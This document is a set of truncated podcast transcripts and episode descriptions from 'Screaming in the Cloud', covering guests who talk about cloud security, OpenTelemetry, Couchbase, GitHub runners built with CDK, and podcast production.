viewing computers.Jeremy: I would believe that it is completely shifted how we view computers. If you know internet and computing history, we’re kind of traveling back to the old ways of the centrally managed server and a bunch of nodes hanging off of it, and they basically being dummy nodes that access that central resource. And so, with the centralization of AWS resources and kind of a lot of the internet there, we’ve turned everyone into just a node that accesses this centralized resource. And with more and more applications moving to the web, like, natively the web, it’s changing the need for compute on the consumer side in such a way that we’ve never seen, ever. We have gone from a standard two-and-a-half, three-foot tall tower sitting in your living room, and this is the family computer to everybody has their own personal computer to everyone has their own laptops to now, people are moving away from even those pieces of hardware to iPads because all of the resources that they use exist on the internet. So, now you get the youngest generation that’s growing up and the only thing that they’ve ever known as far as computers go is an iPad in their hands. When I talk about a tower, what does that mean to them?Corey: It’s kind of weird, but I feel like we went through a generation where it felt like the early days of automobiles, where you needed to be pretty close to a mechanic in order to reliably be convinced you could take a car any meaningful distance. And then they became appliances again. And in some cases, because manufacturers don’t want people working on cars, you also have to be more or less a hacker of sorts to wind up getting access to your car. I think, on some level, that we’ve seen computers turn into appliances like that. When I was a kid, I was one of those kids that was deep into computers and would help the teachers get their overhead projector-style thing working and whatnot.And I think we might be backing away from that, on some level, just because it’s not necessary to have that level of insight into how a system works to use it effectively. And I’m not trying to hold back the tide of progress. I just find it interesting as far as how we
Alex Lawrence, Field CISO at Sysdig, joins Corey on Screaming in the Cloud to discuss how he went from studying bioluminescence and mycology to working in tech, and his stance on why open source is the future of cloud security. Alex draws an interesting parallel between the creative culture at companies like Pixar and the iterative and collaborative culture of open-source software development, and explains why iteration speed is crucial in cloud security. Corey and Alex also discuss the pros and cons of having so many specialized tools that tackle specific functions in cloud security, and the different postures companies take towards their cloud security practices. About AlexAlex Lawrence is a Field CISO at Sysdig. Alex has an extensive history working in the datacenter as well as with the world of DevOps. Prior to moving into a solutions role, Alex spent a majority of his time working in the world of OSS on identity, authentication, user management and security. Alex's educational background has nothing to do with his day-to-day career; however, if you'd like to have a spirited conversation on bioluminescence or fungus, he'd be happy to oblige.Links Referenced: Sysdig: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. This promoted guest episode is brought to us by our friends over at Sysdig, and they have brought to me Alexander Lawrence, who’s a principal security architect over at Sysdig. Alexander, thank you for joining me.Alex: Hey, thanks for having me, Corey.Corey: So, we all have fascinating origin stories. Invariably you talk to someone, no one in tech emerged fully-formed from the forehead of some God. Most of us wound up starting off doing this as a hobby, late at night, sitting in the dark, rarely emerging. You, on the other hand, studied mycology, so watching the rest of us sit in the dark and growing mushrooms was basically how you started, is my understanding of your origin story. Accurate, not accurate at all, or something in between?Alex: Yeah, decently accurate. So, I was in school during the wonderful tech bubble burst, right, high school era, and I always told everybody, there’s no way I’m going to go into technology. There’s tons of people out there looking for a job. Why would I do that? And let’s face it, everybody expected me to, so being an angsty teenager, I couldn’t have that. So, I went into college looking into whatever I thought was interesting, and it turned out I had a predilection to go towards fungus and plants.Corey: Then you realized some of them glow and that wound up being too bright for you, so all right, we’re done with this; time to move into tech?Alex: [laugh]. Strangely enough, my thesis, my capstone, was on the coevolution of bioluminescence across aquatic and terrestrial organisms. And so, did a lot of focused work on specifically bioluminescent fungus and bioluminescing fish, like Photoblepharon palpebratus and things like that.Corey: When I talk to people who are trying to figure out, okay, I don’t like what’s going on in my career, I want to do something different, and their assumption is, oh, I have to start over at square one. It’s no, find the job that’s halfway between what you’re doing now and what you want to be doing, and make lateral moves rather than starting over five years in or whatnot. But I have to wonder, how on earth did you go from A to B in this context?Alex: Yeah, so I had always done tech. My first job really was in tech at the school districts that I went to in high school. And so, I went into college doing tech. I volunteered at the ELCA and other organizations doing tech, and so it basically funded my college career. And by the time I finished up through grad school, I realized my life was going to be writing papers so that other people could do the research that I was coming up with, and I thought that sounded like a pretty miserable life.And so, it became a hobby, and the thing I had done throughout my entire college career was technology, and so that became my new career and vocation. So, I was kind of doing both, and then ended up landing in tech for the job market.Corey: And you’ve effectively moved through the industry to the point where you’re now in security architecture over at Sysdig, which, when I first saw Sysdig launch many years ago, it was, this is an interesting tool. I can see observability stories, I can see understanding what’s going on at a deep level. I liked it as a learning tool, frankly. And it makes sense, with the benefit of hindsight, that oh, yeah, I suppose it does make some sense that there are security implications thereof. But one of the things that you’ve said that I really want to dig into that I’m honestly in full support of because it’ll irritate just the absolute worst kinds of people is—one of the core beliefs that you espouse is that security when it comes to cloud is inherently open-source-based or at least derived. I don’t want to misstate your position on this. How do you view it?Alex: Yeah. Yeah, so basically, the stance I have here is that the future of security in cloud is open-source. And the reason I say that is that it’s a bunch of open standards that have basically produced a lot of the technologies that we’re using in that stack, right, your web servers, your automation tooling, all of your different components are built on open stacks, and people are looking to other open tools to augment those things. And the reality is, is that the security environment that we’re in is changing drastically in the cloud as opposed to what it was like in the on-premises world. On-prem was great—it still is great; a lot of folks still use it and thrive on it—but as we look at the way software is built and the way we interface with infrastructure, the cloud has changed that dramatically.Basically, things are a lot faster than they used to be. The model we have to use in order to make sure our security is good has dramatically changed, right, and all that comes down to speed and how quickly things evolve. I tend to take a position that one single brain—one entity, so to speak—can’t keep up with that rapid evolution of things. Like, a good example is Log4j, right? When Log4j hit this last year, that was a pretty broad attack that affected a lot of people. You saw open tooling out there, like Falco and others, they had a policy to detect and help triage that within a couple of hours of it hitting the internet. Other proprietary tooling, it took much longer than two hours.Corey: Part of me wonders what the root cause behind that delay is because it’s not that the engineers working at these companies are somehow worse than folks in the open communities. In some cases, they’re the same people. It feels like it’s almost corporate process ossification of, “Okay, we built a thing. Now, we need to make sure it goes through branding and legal and marketing and we need to bring in 16 other teams to make this work.” Whereas in the open-source world, it feels like there’s much more of a, “I push the deploy button and it’s up. The end.” There is no step two.Alex: [laugh]. Yeah, so there is certainly a certain element of that. And I think it’s just the way different paradigms work. There’s a fantastic book out there called Creativity, Inc., and it’s basically a book about how Pixar manages itself, right? How do they deal with creating movies? How do they deal with doing what they do, well?And really, what it comes down to is fostering a culture of creativity. And that typically revolves around being able to fail fast, take risks, see if it sticks, see if it works. And it’s not that corporate entities don’t do that. They certainly do, but again, if you think about the way the open-source world works, people are submitting, you know, PRs, pull requests, they’re putting out different solutions, different fixes to problems, and the ones that end up solving it the best are often the ones that end up coming to the top, right? And so, it’s just—the way you iterate is much more akin to that kind of creativity-based mindset that I think you get out of traditional organizations and corporations.Corey: There’s also, I think—I don’t know if this is necessarily the exact point, but it feels like it’s at least aligned with it—where there was for a long time—by which I mean, pretty much 40 years at this point—a debate between open disclosure and telling people of things that you have found in vendors products versus closed disclosure; you only wind—or whatever the term is where you tell the vendor, give them time to fix it, and it gets out the door. But we’ve seen again and again and again, where researchers find something, report it, and then it sits there, in some cases for years, but then when it goes public and the company looks bad as a result, they scramble to fix it. I wish it were not this way, but it seems that in some cases, public shaming is the only thing that works to get companies to secure their stuff.Alex: Yeah, and I don’t know if it’s public shaming, per se, that does it, or it’s just priorities, or it’s just, you know, however it might go, there’s always been this notion of, “Okay, we found a breach. Let’s disclose appropriately, you know, between two entities, give time to remediate.” Because there is a potential risk that if you disclose publicly that it can be abused and used in very malicious ways—and we certainly don’t want that—but there also is a certain level of onus once the disclosure happens privately that we got to
Laurent Doguin, Director of Developer Relations & Strategy at Couchbase, joins Corey on Screaming in the Cloud to talk about the work that Couchbase is doing in the world of databases and developer relations, as well as the role of AI in their industry and beyond. Together, Corey and Laurent discuss Laurent’s many different roles throughout his career including what made him want to come back to a role at Couchbase after stepping away for 5 years. Corey and Laurent dig deep on how Couchbase has grown in recent years and how it’s using artificial intelligence to offer an even better experience to the end user.About LaurentLaurent Doguin is Director of Developer Relations & Strategy at Couchbase (NASDAQ: BASE), a cloud database platform company that 30% of the Fortune 100 depend on.Links Referenced: Couchbase: XKCD #927: DB-Engines: Twitter: LinkedIn: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Are you navigating the complex web of API management, microservices, and Kubernetes in your organization? is here to be your guide to connectivity in the cloud-native universe!, the powerhouse behind Istio, is revolutionizing cloud-native application networking. They brought you Gloo Gateway, the lightweight and ultra-fast gateway built for modern API management, and Gloo Mesh Core, a necessary step to secure, support, and operate your Istio environment.Why struggle with the nuts and bolts of infrastructure when you can focus on what truly matters - your application.’s got your back with networking for applications, not infrastructure. Embrace zero trust security, GitOps automation, and seamless multi-cloud networking, all with here’s the real game-changer: a common interface for every connection, in every direction, all with one API. It’s the future of connectivity, and it’s called Gloo by and Platform Engineers, your journey to a seamless cloud-native experience starts here. Visit today and level up your networking game.Corey: Welcome to Screaming in the Cloud, I’m Corey Quinn. This promoted guest episode is brought to us by our friends at Couchbase. And before we start talking about Couchbase, I would rather talk about not being at Couchbase. Laurent Doguin is the Director of Developer Relations and Strategy at Couchbase. First, Laurent, thank you for joining me.Laurent: Thanks for having me. It’s a pleasure to be here.Corey: So, what I find interesting is that this is your second time at Couchbase, where you were a developer advocate there for a couple of years, then you had five years of, we’ll call it wilderness I suppose, and then you return to be the Director of Developer Relations. Which also ties into my personal working thesis of, the best way to get promoted at a lot of companies is to leave and then come back. But what caused you to decide, all right, I’m going to go work somewhere else? And what made you come back?Laurent: So, I’ve joined Couchbase in 2014. Spent about two or three years as a DA. And during those three years as a developer advocate, I’ve been advocating SQL database and I—at the time, it was mostly DBAs and ops I was talking to. And DBA and ops are, well, recent, modern ops are writing code, but they were not the people I wanted to talk to you when I was a developer advocate. I came from a background of developer, I’ve been a platform engineer for an enterprise content management company. I was writing code all day.And when I came to Couchbase, I realized I was mostly talking about Docker and Kubernetes, which is still cool, but not what I wanted to do. I wanted to talk about developers, how they use database to be better app, how they use key-value, and those weird thing like MapReduce. At the time, MapReduce was still, like, a weird thing for a lot of people, and probably still is because now everybody’s doing SQL. So, that’s what I wanted to talk about. I wanted to… engage with people identify with, really. And so, didn’t happen. Left. Built a Platform as a Service company called Clever Cloud. They started about four or five years before I joined. We went from seven people to thirty-one LFs, fully bootstrapped, no VC. That’s an interesting way to build a company in this age.Corey: Very hard to do because it takes a lot of upfront investment to build software, but you can sort of subsidize that via services, which is what we’ve done here in some respects. But yeah, that’s a hard road to walk.Laurent: That’s the model we had—and especially when your competition is AWS or Azure or GCP, so that was interesting. So entrepreneurship, it’s not for everyone. I did my four years there and then I realized, maybe I’m going to do something else. I met my former colleagues of Couchbase at a software conference called Devoxx, in France, and they told me, “Well, there’s a new sheriff in town. You should come back and talk to us. It’s all about developers, we are repositioning, rehandling the way we do marketing at Couchbase. Why not have a conversation with our new CMO, John Kreisa?”And I said, “Well, I mean, I don’t have anything to do. I actually built a brewery during that past year with some friends. That was great, but that’s not going to feed me or anything. So yeah, let’s have a conversation about work.” And so, I talked to John, I talked to a bunch of other people, and I realized [unintelligible 00:03:51], he actually changed, like, there was a—they were purposely going [against 00:03:55] developer, talking to developer. And that was not the case, necessarily, five, six years before that.So, that’s why I came back. The product is still amazing, the people are still amazing. It was interesting to find a lot of people that still work there after, what, five years. And it’s a company based in… California, headquartered in California, so you would expect people to, you know, jump around a bit. And I was pleasantly surprised to find the same folks there. So, that was also one of the reasons why I came back.Corey: It’s always a strong endorsement when former employees rejoin a company. Because, I don’t know about you, but I’ve always been aware of those companies you work for, you leave. Like, “Aw, I’m never doing that again for love or money,” just because it was such an unpleasant experience. So, it speaks well when you see companies that do have a culture of boomerangs, for lack of a better term.Laurent: That’s the one we use internally, and there’s a couple. More than a couple.Corey: So, one thing that seems to have been a thread through most of your career has been an emphasis on developer experience. And I don’t know if we come at it from the same perspective, but to me, what drives nuts is honestly, with my work in cloud, bad developer experience manifests as the developer in question feeling like they’re somehow not very good at their job. Like, they’re somehow not understanding how all this stuff is supposed to work, and honestly, it leads to feeling like a giant fraud. And I find that it’s pernicious because even when I intellectually know for a fact that I’m not the dumbest person ever to use this tool when I don’t understand how something works, the bad developer experience manifests to me as, “You’re not good enough.” At least, that’s where I come at it from.Laurent: And also, I [unintelligible 00:05:34] to people that build these products because if we build the products, the user might be in the same position that we are right now. And so, we might be responsible for that experience [unintelligible 00:05:43] a developer, and that’s not a great feeling. So, I completely agree with you. I’ve tried to… always on software-focused companies, whether it was Nuxeo, Couchbase, Clever Cloud, and then Couchbase. And I guess one of the good thing about coming back to a developer-focused era is all the product alignments.Like, a lot of people talk about product that [grows 00:06:08] and what it means. To me what it means was, what it meant—what it still means—building a product that developer wants to use, and not just want to, sometimes it’s imposed to you, but actually are happy to use, and as you said, don’t feel completely stupid about it in front of the product. It goes through different things. We’ve recently revamped our Couchbase UI, Couchbase Capella UI—Couchbase Capella is a managed cloud product—and so we’ve added a lot of in-product getting started guidelines, snippets of code, to help developers getting started better and not have that feeling of, “What am I doing? Why is it not working and what’s going on?”Corey: That’s an interesting decision to make, just because historically, working with a bunch of tools, the folks who are building the documentation working with that tool, tend to generally be experts at it, so they tend to optimize for improving things for the experience of someone has been using it for five years as opposed to the newcomer. So, I find that the longer a product is in existence, in many cases, the worse the new user experience becomes because companies tend to grow and sprawl in different ways, the product does likewise. And if you don’t know the history behind it, “Oh, your company, what does it do?” And you look at the website and there’s 50 different offerings that you have—like, the AWS landing page—it becomes overwhelming very quickly. So, it’s neat to see that emphasis throughout the user interface on the new developer experience.On the other side of it, though, how are th
Mike Goldsmith, Staff Software Engineer at Honeycomb, joins Corey on Screaming in the Cloud to talk about Open Telemetry, company culture, and the pros and cons of Go vs. .NET. Corey and Mike discuss why OTel is such an important tool, while pointing out its double-edged sword of being fully open-source and community-driven. Opening up about Honeycomb’s company culture and how to find a work-life balance as a fully-remote employee, Mike points out how core-values and social interaction breathe life into a company like Honeycomb.About MikeMike is an OpenSource focused software engineer that builds tools to help users create, shape and deliver system & application telemetry. Mike contributes to a number of OpenTelemetry initiatives including being a maintainer for Go Auto instrumentation agent, Go proto packages and an emeritus .NET SDK maintainer..Links Referenced: Honeycomb: Twitter: Honeycomb blog: LinkedIn: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. This promoted guest episode is brought to us by our friends at Honeycomb who I just love talking to. And we’ve gotten to talk to these folks a bunch of different times in a bunch of different ways. They’ve been a recurring sponsor of this show and my other media nonsense, they’ve been a reference customer for our consulting work at The Duckbill Group a couple of times now, and we just love working with them just because every time we do we learn something from it. I imagine today is going to be no exception. My guest is Mike Goldsmith, who’s a staff software engineer over at Honeycomb. Mike, welcome to the show.Mike: Hello. Thank you for having me on the show today.Corey: So, I have been familiar with Honeycomb for a long time. And I’m still trying to break myself out of the misapprehension that, oh, they’re a small, scrappy, 12-person company. You are very much not that anymore. So, we’ve gotten to a point now where I definitely have to ask the question: what part of the observability universe that Honeycomb encompasses do you focus on?Mike: For myself, I’m very focused on the telemetry side, so the place where I work on the tools that customers deploy in their own infrastructure to collect all of that useful data and make—that we can then send on to Honeycomb to make use of and help identify where the problems are, where things are changing, how we can best serve that data.Corey: You’ve been, I guess on some level, there’s—I’m trying to make this not sound like an accusation, but I don’t know if we can necessarily avoid that—you have been heavily involved in OpenTelemetry for a while, both professionally, as well as an open-source contributor in your free time because apparently you also don’t know how to walk away from work when the workday is done. So, let’s talk about that a little bit because I have a number of questions. Starting at the very beginning, for those who have not gone trekking through that particular part of the wilderness-slash-swamp, what is OpenTelemetry?Mike: So, OpenTelemetry is a vendor-agnostic set of tools that allow anybody to collect data about their system and then send it to a target back-end to make use of that data. The data, the visualization tools, and the tools that make use of that data are a variety of different things, so whether it’s tracing data or metrics or logs, and then it’s trying to take value from that. The big thing what OpenTelemetry is aimed at doing is making the collection of the data and the transit of the data to wherever you want to send it a community-owned resource, so it’s not like you get vendor lock-in by going to using one competitor and then go to a different—you want to go and try a different tool and you’ve got to re-instrument or change your application heavily to make use of that. OpenTelemetry abstracts all that away, so all you need to know about is what you’re instrumented with, what [unintelligible 00:03:22] can make of that data, and then you can send it to one or multiple different tools to make use of that data. So, you can even compare some tools side-by-side if you wanted to.Corey: So, given that it’s an open format, from the customer side of the world, this sounds awesome. Is it envisioned that this is something—an instrument that gets instrumented at the application itself or once I send it to another observability vendor, is it envisioned that okay, if I send this data to Honeycomb, I can then instrument what Honeycomb sees about that and then send that onward somewhere else, maybe my ancient rsyslog server, maybe a different observability vendor that has a different emphasis. Like, how is it envisioned unfolding within the ecosystem? Like, in other words, can I build a giant ring of these things that just keep building an infinitely expensive loop?Mike: Yeah. So ideally, you would try and try to pick one or a few tools that will provide the most value that you can send to, and then it could answer all of the questions for you. So, at Honeycomb, we try to—we are primarily focused on tracing because we want to do application-level information to say, this user had this interaction, this is the context of what happened, these are the things that they clicked on, this is the information that flowed through your back-end system, this is the line-item order that was generated, the email content, all of those things all linked together so we know that person did this thing, it took this amount of time, and then over a longer period of time, from the analytics point of view, you can then say, “These are the most popular things that people are doing. This is typically how long it takes.” And then we can highlight outliers to say, “Okay, this person is having an issue.” This individual person, we can identify them and say, “This is an issue. This is what’s different about what they’re doing.”So, that’s quite a unique tracing tool or opportunity there. So, that lets you really drive what’s happening rather than what has happened. So, logs and metrics are very backward-looking to say, “This is the thing that this thing happened,” and tries to give you the context about it. Tracing tries to give you that extra layer of context to say that this thing happened and it had all of these things related to it, and why is it interesting?Corey: It’s odd to me that vendors would be putting as much energy into OpenTelemetry—or OTel, as it seems to always be abbreviated as when I encounter it, so I’m using the term just so people, “Oh, wait, that’s that thing I keep seeing. What is that?” Great—but it seems odd to me that vendors would be as embracing of that technology as they have been, just because historically, I remember whenever I had an application when I was using production in anger—which honestly, ‘anger’ is a great name for the production environment—whenever I was trying to instrument things, it was okay, you’d have to grab this APM tools library and instrument there, and then something else as well, and you wound up with an order of operations where which one wrapped the other. And sometimes that caused problems. And of course, changing vendors meant you had to go and redeploy your entire application with different instrumentation and hope nothing broke. There was a lock-in story that was great for the incumbents back when that was state of the art. But even some of those incumbents are now embracing OTel. Why?Mike: I think it’s because it’s showing that there’s such a diverse group of tools there, and [unintelligible 00:06:32] being the one that you’ve selected a number of years ago and then they could hold on to that. The momentum slowed because they were able to move at a slower pace because they were the organizations that allowed us—they were the de facto tooling. And then once new companies and competitors came around and we’re open to trying to get a part of that market share, it’s given the opportunity to then really pick the tool that is right for the job, rather than just the best than what is perceived to be the best tool because they’re the largest one or the ones that most people are using. OpenTelemetry allows you to make an organization and a tool that’s providing those tools focus on being the best at it, rather than just the biggest one.Corey: That is, I think, a more enlightened perspective than frankly, I expect a number of companies out there to have taken, just because it seems like lock-in seems to be the order of the day for an awful lot of companies. Like, “Okay, why are customers going to stay with us?” “Because we make it hard to leave,” is… I can understand the incentive, but that only works for so long if you’re not actively solving a problem that customers have. One of the challenges that I ran into, even with OTel, was back when I was last trying to instrument a distributed application—which was built entirely on Lambda—is the fact that I was doing this for an application that was built entirely on Lambda. And it felt like the right answer was to, oh, just use an OTel layer—a Lambda layer that wound up providing the functionality you cared about.But every vendor seemed to have their own. Honeycomb had one, Lightstep had one, AWS had one, and now it’s oh, dear, this is just the next evolution of that specific agent problem. How did that play out? Is that still the way it works? Is there other good reasons for this? Or is this just people trying to slap a logo on things?Mike: Yeah, so being a fully open-source project and a community-dr
Amir Szekely, Owner at CloudSnorkel, joins Corey on Screaming in the Cloud to discuss how he got his start in the early days of cloud and his solo project, CloudSnorkel. Throughout this conversation, Corey and Amir discuss the importance of being pragmatic when moving to the cloud, and the different approaches they see in developers from the early days of cloud to now. Amir shares what motivates him to develop open-source projects, and why he finds fulfillment in fixing bugs and operating CloudSnorkel as a one-man show. About AmirAmir Szekely is a cloud consultant specializing in deployment automation, AWS CDK, CloudFormation, and CI/CD. His background includes security, virtualization, and Windows development. Amir enjoys creating open-source projects like cdk-github-runners, cdk-turbo-layers, and NSIS.Links Referenced: CloudSnorkel: Personal website: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn, and this is an episode that I have been angling for for longer than you might imagine. My guest today is Amir Szekely, who’s the owner at CloudSnorkel. Amir, thank you for joining me.Amir: Thanks for having me, Corey. I love being here.Corey: So, I’ve been using one of your open-source projects for an embarrassingly long amount of time, and for the longest time, I make the critical mistake of referring to the project itself as CloudSnorkel because that’s the word that shows up in the GitHub project that I can actually see that jumps out at me. The actual name of the project within your org is cdk-github-runners if I’m not mistaken.Amir: That’s real original, right?Corey: Exactly. It’s like, “Oh, good, I’ll just mention that, and suddenly everyone will know what I’m talking about.” But ignoring the problems of naming things well, which is a pain that everyone at AWS or who uses it knows far too well, the product is basically magic. Before I wind up basically embarrassing myself by doing a poor job of explaining what it is, how do you think about it?Amir: Well, I mean, it’s a pretty simple project, which I think what makes it great as well. It creates GitHub runners with CDK. That’s about it. It’s in the name, and it just does that. And I really tried to make it as simple as possible and kind of learn from other projects that I’ve seen that are similar, and basically learn from my pain points in them.I think the reason I started is because I actually deployed CDK runners—sorry, GitHub runners—for one company, and I ended up using the Kubernetes one, right? So, GitHub in themselves, they have two projects they recommend—and not to nudge GitHub, please recommend my project one day as well—they have the Kubernetes controller and they have the Terraform deployer. And the specific client that I worked for, they wanted to use Kubernetes. And I tried to deploy it, and, Corey, I swear, I worked three days; three days to deploy the thing, which was crazy to me. And every single step of the way, I had to go and read some documentation, figure out what I did wrong, and apparently the order the documentation was was incorrect.And I had to—I even opened tickets, and they—you know, they were rightfully like, “It’s open-source project. Please contribute and fix the documentation for us.” At that point, I said, “Nah.” [laugh]. Let me create something better with CDK and I decided just to have the simplest setup possible.So usually, right, what you end up doing in these projects, you have to set up either secrets or SSM parameters, and you have to prepare the ground and you have to get your GitHub token and all those things. And that’s just annoying. So, I decided to create a—Corey: So much busy work.Amir: Yes, yeah, so much busy work and so much boilerplate and so much figuring out the right way and the right order, and just annoying. So, I decided to create a setup page. I thought, “What if you can actually install it just like you install any app on GitHub,” which is the way it’s supposed to be right? So, when you install cdk-github-runners—CloudSnorkel—you get an HTML page and you just click a few buttons and you tell it where to install it and it just installs it for you. And it sets the secrets and everything. And if you want to change the secret, you don’t have to redeploy. You can just change the secret, right? You have to roll the token over or whatever. So, it’s much, much easier to install.Corey: And I feel like I discovered this project through one of the more surreal approaches—and I had cause to revisit it a few weeks ago when I was redoing my talk for the CDK Community Day, which has since happened and people liked the talk—and I mentioned what CloudSnorkel had been doing and how I was using the runners accordingly. So, that was what I accidentally caused me to pop back up with, “Hey, I’ve got some issues here.” But we’ll get to that. Because once upon a time, I built a Twitter client for creating threads because shitposting is my love language, I would sit and create Twitter threads in the middle of live keynote talks. Threading in the native client was always terrible, and I wanted to build something that would help me do that. So, I did.And it was up for a while. It’s not anymore because I’m not paying $42,000 a month in API costs to some jackass, but it still exists in the form of if you want to create threads on Mastodon. But after I put this out, some people complained that it was slow.To which my response was, “What do you mean? It’s super fast for me in San Francisco talking to it hosted in Oregon.” But on every round trip from halfway around the world, it became a problem. So, I got it into my head that since this thing was fully stateless, other than a Lambda function being fronted via an API Gateway, that I should deploy it to every region. It didn’t quite fit into a Cloudflare Worker or into one of the Edge Lambda functions that AWS has given up on, but okay, how do I deploy something to every region?And the answer is, with great difficulty because it’s clear that no one was ever imagining with all those regions that anyone would use all of them. It’s imagined that most customers use two or three, but customers are different, so which two or three is going to be widely varied. So, anything halfway sensible about doing deployments like this didn’t work out. Again, because this thing was also a Lambda function and an API Gateway, it was dirt cheap, so I didn’t really want to start spending stupid amounts of money doing deployment infrastructure and the rest.So okay, how do I do this? Well, GitHub Actions is awesome. It is basically what all of AWS’s code offerings wish that they were. CodeBuild is sad and this was kind of great. The problem is, once you’re out of the free tier, and if you’re a bad developer where you do a deploy on every iteration, suddenly it starts costing for what I was doing in every region, something like a quarter of per deploy, which adds up when you’re really, really bad at programming.Amir: [laugh].Corey: So, their matrix jobs are awesome, but I wanted to do some self-hosted runners. How do I do that? And I want to keep it cheap, so how do I do a self-hosted runner inside of a Lambda function? Which led me directly to you. And it was nothing short of astonishing. This was a few years ago. I seem to recall that it used to be a bit less well-architected in terms of its elegance. Did it always use step functions, for example, to wind up orchestrating these things?Amir: Yeah, so I do remember that day. We met pretty much… basically as a joke because the Lambda Runner was a joke that I did, and I posted on Twitter, and I was half-proud of my joke that starts in ten seconds, right? But yeah, no, the—I think it always used functions. I’ve been kind of in love with the functions for the past two years. They just—they’re nice.Corey: Oh, they’re magic, and AWS is so bad at telling their story. Both of those things are true.Amir: Yeah. And the API is not amazing. But like, when you get it working—and you know, you have to spend some time to get it working—it’s really nice because then you have nothing to manage, ever. And they can call APIs directly now, so you don’t have to even create Lambdas. It’s pretty cool.Corey: And what I loved is you wind up deploying this thing to whatever account you want it to live within. What is it, the OIDC? I always get those letters in the wrong direction. OIDC, I think, is correct.Amir: I think it’s OIDC, yeah.Corey: Yeah, and it winds up doing this through a secure method as opposed to just okay, now anyone with access to the project can deploy into your account, which is not ideal. And it just works. It spins up a whole bunch of these Lambda functions that are using a Docker image as the deployment environment. And yeah, all right, if effectively my CDK deploy—which is what it’s doing inside of this thing—doesn’t complete within 15 minutes, then it’s not going to and the thing is going to break out. We’ve solved the halting problem. After 15 minutes, the loop will terminate. The end.But that’s never been a problem, even with getting ACM certificates spun up. It completes well within that time limit. And its cost to me is effectively nothing. With one key exception: that you made the choice to use Secrets Manager to wind up storing a lot of the things it cares about instead of Parameter Store, so I think you wind up costing me—I think there’s two of th
Chris Hill, owner of HumblePod and host of the We Built This Brand podcast, joins Corey on Screaming in the Cloud to discuss the future of podcasting and the role emerging technologies will play in the podcasting space. Chris describes why AI is struggling to make a big impact in the world of podcasting, and also emphasizes the importance of authenticity and finding a niche when producing a show. Corey and Chris discuss where video podcasting works and where it doesn’t, and why it’s more important to focus on the content of your podcast than the technical specs of your gear. Chris also shares insight on how to gauge the health of your podcast audience with his Podcast Listener Lifecycle evaluation tool.About ChrisChris Hill is a Knoxville, TN native and owner of the podcast production company, HumblePod. He helps his customers create, develop, and produce podcasts and is working with clients in Knoxville as well as startups and entrepreneurs across the United States, Silicon Valley, and the world.In addition to producing podcasts for nationally-recognized thought leaders, Chris is the co-host and producer of the award-winning Our Humble Beer Podcast and the host of the newly-launched We Built This Brand podcast. He also lectures at the University of Tennessee, where he leads non-credit courses on podcasts and marketing.  He received his undergraduate degree in business at the University of Tennessee at Chattanooga where he majored in Marketing & Entrepreneurship, and he later received his MBA from King University.Chris currently serves his community as the President of the American Marketing Association in Knoxville. In his spare time, he enjoys hanging out with the local craft beer community, international travel, exploring the great outdoors, and his many creative pursuits.Links Referenced: HumblePod: HumblePod Quick Edit: Podcast Listener Lifecycle: Twitter: Transcript:Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Are you navigating the complex web of API management, microservices, and Kubernetes in your organization? is here to be your guide to connectivity in the cloud-native universe!, the powerhouse behind Istio, is revolutionizing cloud-native application networking. They brought you Gloo Gateway, the lightweight and ultra-fast gateway built for modern API management, and Gloo Mesh Core, a necessary step to secure, support, and operate your Istio environment.Why struggle with the nuts and bolts of infrastructure when you can focus on what truly matters - your application.’s got your back with networking for applications, not infrastructure. Embrace zero trust security, GitOps automation, and seamless multi-cloud networking, all with here’s the real game-changer: a common interface for every connection, in every direction, all with one API. It’s the future of connectivity, and it’s called Gloo by and Platform Engineers, your journey to a seamless cloud-native experience starts here. Visit today and level up your networking game.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. My returning guest probably knows more about this podcast than I do. Chris Hill is not only the CEO of HumblePod, but he’s also the producer of a lot of my various media endeavors, ranging from the psychotic music videos that I wind up putting out to mock executives on their birthdays to more normal videos that I wind up recording when I’m forced into the studio and can’t escape because they bar the back exits, to this show. Chris, thank you for joining me, it’s nice to see you step into the light.Chris: It’s a pleasure to be here, Corey.Corey: So, you have been, effectively, producing this entire podcast after I migrated off of a previous vendor, what four years ago? Five?Chris: About four or five years ago now, yeah. It’s been a while.Corey: Time is a flat circle. It’s hard to keep track of all of that. But it’s weird that you and I don’t get to talk nearly as much as we used to, just because, frankly, the process is working and therefore, you disappear into the background.Chris: Yeah.Corey: One of the dangerous parts of that is that the only time I ever wind up talking to you is when something has gone wrong somewhere and frankly, that does not happen anymore. Which means we don’t talk.Chris: Yeah. And I’m okay with that. I’m just kidding. I love talking to you, Corey.Corey: Oh, I tolerate you. And every once in a while, you irritate me massively, which is why I’m punishing you this year by—Chris: [laugh].Corey: Making you tag along for re:Invent.Chris: I’m really excited about that one. It’s going to be fun to be there with you and Jeremy and Mike and everybody. Looking forward to it.Corey: You know how I can tell that you’ve never been to re:Invent before?Chris: “I’m looking forward to it.”Corey: Exactly. You still have life in your eyes and a spark in your step. And yeah… that’ll change. That’ll change. So, a lot of this show is indirectly your fault because this is a weird thing for a podcaster to admit, but I genuinely don’t listen to podcasts. I did when I was younger, back when I had what the kids today call ‘commute’ or 